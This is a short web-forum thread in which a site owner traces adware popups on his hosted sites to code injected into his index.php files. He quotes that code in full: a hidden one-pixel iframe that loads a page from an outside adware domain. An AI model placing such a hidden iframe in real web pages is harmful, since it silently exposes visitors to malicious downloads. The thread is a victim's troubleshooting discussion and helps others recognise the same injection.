Thread: Website hijack

    #1
  1. Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Nov 2001
    Posts
    74
    Rep Power
    14

    Website hijack


    Is it possible that a website completely coded by us is hijacked by some sort of Toolbar installer?

    Since last week i got a very annoying popup at almost all of our sites and i don't have any idea where it comes from. It tries to install an XXX toolbar.

    I already updated/ran Adaware and Norton Antivirus on my PC and visited the sites on a clean installed laptop but the problem persists.

    Anyone has an idea?

    http://www.bruggebusiness.com/
  2. #2
  3. No Profile Picture
    Contributing User
    Devshed Intermediate (1500 - 1999 posts)

    Join Date
    Feb 2004
    Location
    Lawrence, Kansas [KU]
    Posts
    1,559
    Rep Power
    15
    do you see anything weird in any of your website's directories? (i.e.: anything you yourself didn't put there?)
  4. #3
  5. Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Nov 2001
    Posts
    74
    Rep Power
    14
    Originally Posted by jacktasia
    do you see anything weird in any of your website's directories? (i.e.: anything you yourself didn't put there?)
    Nope, Already checked code and content of the FTP, but i just noticed something very ugly ...

    Looks like almost all sites hosted on our dedicated server have this problem. Guess i could best contact our system admin

    Any other suggestions?
  6. #4
  7. No Profile Picture
    Contributing User
    Devshed Intermediate (1500 - 1999 posts)

    Join Date
    Feb 2004
    Location
    Lawrence, Kansas [KU]
    Posts
    1,559
    Rep Power
    15
    Originally Posted by [ArcanE]
    Looks like almost all sites hosted on our dedicated server have this problem. Guess i could best contact our system admin
    i would contact him as soon as possible, because i don't think anyone else would be able to fix it.
  8. #5
  9. Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Nov 2001
    Posts
    74
    Rep Power
    14
    Looks like i found the problem. Somehow some malicious code has nested itself inside my index.php files.

    <IFRAME SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 HEIGHT=1></IFRAME>

    This code explains the nasty popups.
    I'm gonna have to check the workstations at the office if this problem occurred before or after upload. Hope it happened before, else we might be in a very bad situation with a server infected with some nasty adware/troyans

IMN logo majestic logo threadwatch logo seochat tools logo